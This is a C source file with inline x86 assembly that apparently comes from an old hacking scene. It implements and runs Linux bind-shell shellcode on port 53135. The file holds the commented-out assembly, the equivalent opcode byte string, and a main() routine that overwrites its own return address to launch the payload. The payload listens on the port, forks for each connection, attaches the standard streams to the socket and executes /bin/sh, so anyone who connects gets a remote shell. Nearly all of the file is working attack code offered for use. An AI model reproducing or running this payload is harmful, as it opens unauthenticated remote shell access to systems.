/* Exile2k's Giving ** ---------------- ** This is another way to bind a shell to a port. ** Thanx to binf for advises. ** shellcode : bind a shell to port 53135 ** */ /* int main() { asm(" movl %ebp, %esp xorl %eax, %eax movw $0x104, %ax add %eax, %esp movl $0x6e69622f, (%esp) movl $0x4268732f, 0x4(%esp) xorl %eax, %eax movl %eax, 0x10(%esp) movb $0x2, 0x10(%esp) movw $0x8fcf, 0x12(%esp) movl %eax, 0x14(%esp) movl $0x08049630, 0x18(%esp) movl $0x08049644, 0x1c(%esp) "); // sc = socket(2, 1 ,6); asm(" inc %eax movl %eax, 0x24(%esp) movl %eax, %ebx inc %eax movl %eax, 0x20(%esp) movb $0x6, %al movl %eax, 0x28(%esp) movb $0x66, %al leal 0x20(%esp), %ecx int $0x80 movl %eax, 0x20(%esp) "); // Appel a bind(sd, &struct sockaddr, 16) // correction de la structure sockaddr_in codee en hard dans les data. asm(" leal 0x10(%esp), %ecx movl %ecx, 0x24(%esp) leal 0x20(%esp), %ecx xorl %eax, %eax movb $0x2, %al movl %eax,%ebx movb $0x10, %al movl %eax, 0x28(%esp) movb $0x66, %al int $0x80 "); // appel a listen(sd, 4) asm(" xorl %eax, %eax movb $0x4, %al movl %eax, %ebx movb $0x66, %al int $0x80 "); // appel a fork() asm(" xorl %ebx,%ebx movl %ebx,%eax movb $0x2,%al int $0x80 cmp %eax,%ebx je accept_it xorl %eax,%eax inc %eax int $0x80 "); // appel a sc = accept(sd, &client_addr,&16) asm(" accept_it: leal 0x10(%esp), %ecx movl %ecx, 0x24(%esp) xorl %eax,%eax movb $0x10, %al movl %eax, 0xc(%esp) leal 0xc(%esp), %ecx movl %ecx, 0x28(%esp) leal 0x20(%esp), %ecx movb $0x66, %al movb $0x5, %bl int $0x80 movl %eax, 0x2c(%esp) "); // appel au fork() asm(" xorl %ebx, %ebx xorl %eax, %eax movb $0x2, %al int $0x80 cmp %eax, %ebx je launch movl 0x2c(%esp), %ebx xorl %eax, %eax movb $0x6, %al int $0x80 jmp accept_it "); // associe stdin,stdout et stderr a la socket avec dup2() asm(" launch: movl 0x2c(%esp), %ebx xorl %ecx,%ecx movb $0x3f, %al int $0x80 xorl %eax,%eax movb $0x3f, %al inc %ecx int $0x80 xorl %eax,%eax movb $0x3f, %al inc %ecx int $0x80 "); // execve("/bin/sh","/bin/sh",0,0); asm(" xorl %eax, %eax movb %al, 0x7(%esp) mov %esp, 0x8(%esp) mov %eax, 0xC(%esp) mov %esp, %ebx lea 0x8(%esp), %ecx lea 0xc(%esp), %edx movb $0xb, %al int $0x80 xorl %ebx, %ebx movl %ebx, %eax inc %eax int $0x80 "); } */ char shellcode[] = "\x89\xec\x31\xc0\x66\xb8\x04\x01\x01\xc4\xc7\x04\x24\x2f\x62\x69\x6e" "\xc7\x44\x24\x04\x2f\x73\x68\x42\x31\xc0\x89\x44\x24\x10\xc6\x44\x24" "\x10\x02\x66\xc7\x44\x24\x12\xcf\x8f\x89\x44\x24\x14\xc7\x44\x24\x18" "\x30\x96\x04\x08\xc7\x44\x24\x1c\x44\x96\x04\x08\x40\x89\x44\x24\x24" "\x89\xc3\x40\x89\x44\x24\x20\xb0\x06\x89\x44\x24\x28\xb0\x66\x8d\x4c" "\x24\x20\xcd\x80\x89\x44\x24\x20\x8d\x4c\x24\x10\x89\x4c\x24\x24\x8d" "\x4c\x24\x20\x31\xc0\xb0\x02\x89\xc3\xb0\x10\x89\x44\x24\x28\xb0\x66" "\xcd\x80\x31\xc0\xb0\x04\x89\xc3\xb0\x66\xcd\x80\x31\xdb\x89\xd8\xb0" "\x02\xcd\x80\x39\xc3\x74\x05\x31\xc0\x40\xcd\x80\x8d\x4c\x24\x10\x89" "\x4c\x24\x24\x31\xc0\xb0\x10\x89\x44\x24\x0c\x8d\x4c\x24\x0c\x89\x4c" "\x24\x28\x8d\x4c\x24\x20\xb0\x66\xb3\x05\xcd\x80\x89\x44\x24\x2c\x31" "\xdb\x31\xc0\xb0\x02\xcd\x80\x39\xc3\x74\x0c\x8b\x5c\x24\x2c\x31\xc0" "\xb0\x06\xcd\x80\xeb\xc2\x8b\x5c\x24\x2c\x31\xc9\xb0\x3f\xcd\x80\x31" "\xc0\xb0\x3f\x41\xcd\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31\xc0\x88\x44" "\x24\x07\x89\x64\x24\x08\x89\x44\x24\x0c\x89\xe3\x8d\x4c\x24\x08\x8d" "\x54\x24\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80"; int main(int argc, char **argv) { int *b; printf("%i\n", strlen(shellcode)); b = (int *) &b + 2; (char *) *b = shellcode; printf("telnet to port 53135 to have phun\n" "And don't forget to kill all %s running\n", argv[0]); return 0; }